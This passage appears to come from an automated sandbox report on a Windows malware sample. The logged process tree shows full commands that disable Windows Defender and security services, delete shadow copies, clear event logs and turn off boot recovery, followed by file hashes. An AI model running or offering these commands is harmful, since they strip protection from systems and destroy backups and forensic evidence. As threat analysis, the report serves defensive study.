sc.exe PID 2852 wrote to memory of 2036 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 2036 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 1760 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 1760 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 1760 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe PID 2852 wrote to memory of 656 2852 a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe sc.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:2652
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:2964
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2588
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2640
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2476
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2360
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1672
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2348
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:2368
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:2428
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:2896
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:2036
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:1760
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:656
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:436
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1488
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2660
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2716
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2724
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2752
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2756
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1708
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1852
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1816
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1044
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2292
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2100
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2552
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2672
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2624
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1728
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1328
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1352
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1140
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1952
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1940
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1920
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2800
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1980
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3004
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2008
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:892
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2080
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2132
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1972
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1008
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1756
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1032
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1908
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1748
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:752
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1520
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:864
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3024
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1732
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2640
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59215e2ac5b68b7ecb9ec8699d7c4c16a
SHA1dc23bb7faf774d90b36e8d8c090c6b70663728c1
SHA256a4544cf7d82ea7f78472ecfe937dc0a54d808e62f4a16b96f71538064e6c1820
SHA512b2367fe5221486c004167d30ac7c89a47f9ddfdd9307b9a066955526177911429bfd57425aae96ceced7822a64888c9b3eb0c1caf87a0e5723de3450b07de70f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FSVNUKCLFD0XHB7O143J.temp
Filesize7KB
MD5da9506314df3bc10df360b8583f5c5dc
SHA1cdd600e39abdaae4ae72437efe2720a0ead03e54
SHA256830b53ebf6842777f07c7c326fb2bb6605dcabeb29fce05268ddbdc5c266258c
SHA51211369a918bf0453df94585f8f48bf6e2277642e110dc7df5c94fbc3bf6b8460104aa09712a69cb971fee4455f468b3e7e2253cfbeb4277c473fe58572a40cece
-
Filesize
36.1MB
MD52fe34c24067dee6bfc42c0d64a03f78b
SHA18889e05e2f57ce4f6507a0f7645dd1f6d630832b
SHA25663250ae43aa9eaae4a9a256c99102d5a0e87663318310a56cffa9ee19dca44b5
SHA51292334ed7c4b3c78b0ef987c19ba07fb8ed432952fe884986fa1c93e2edf61f5c631d31ed2a584d6a085937cc0428913347ec3f7e3a2e4838cd0abb81fabbc07b